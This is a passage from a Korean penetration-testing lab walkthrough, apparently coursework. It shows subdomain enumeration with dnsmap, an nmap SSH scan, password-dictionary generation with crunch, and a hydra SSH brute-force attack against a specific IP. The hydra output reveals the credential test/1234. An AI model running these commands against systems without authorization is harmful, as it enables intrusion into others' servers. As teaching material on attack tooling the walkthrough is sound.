apt-get update -y
apt-get install dnsmap
apt-get install nmap
apt-get install crunch
apt-get install hydra
2. 도메인 조회
dnsmap nct-seoul.com
blog.nct-seoul.com
IP address #1: 211.188.53.97
test.nct-seoul.com
IP address #1: 211.188.53.97
www.nct-seoul.com
IP address #1: 211.188.53.97
[+] 3 (sub)domains and 3 IP address(es) found
[+] completion time: 10 second(s)
root@hacker01:~#
숙제 참고
https://brunch.co.kr/@topasvga/4664
nmap -Pn -p 22 -sV -T4 211.188.53.97
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.7 (protocol 2.0)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
root@hacker01:~#
‘패스워드 사전’ 생성
crunch 4 4 1234 -o dic.txt
root@hacker01:~# more dic.txt
1111
1112
1113
1114
1121
1122
1123
1124
1131
1132
1133
crunch 5 5 abcdefghijklmnopqrstuvwxyz -o dic.txt
aaaaa ~ zzzzz 까지 생성됩니다.
5. 패스워드 접속 대입 공격
hydra -t 4 -l test -P dic.txt 서버공인ip(타깃Target_IP) ssh
hydra -t 4 -l test -P dic.txt 211.188.53.97 ssh
[DATA] attacking ssh://211.188.53.97:22/
[22][ssh] host: 211.188.53.97 login: test password: 1234
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-26 13:41:59
hydra -t 4 -l test -P dic.txt 211.188.53.97 ssh
hydra
→ THC-Hydra라는 툴(병렬 로그인 시도/브루트포스 도구)을 실행한다는 명령어 이름입니다.
-t 4
→ 동시에 실행할 작업(task, 스레드)의 수를 4개로 설정합니다(동시 접속 시도 수).
-l test
다음
https://brunch.co.kr/@topasvga/4713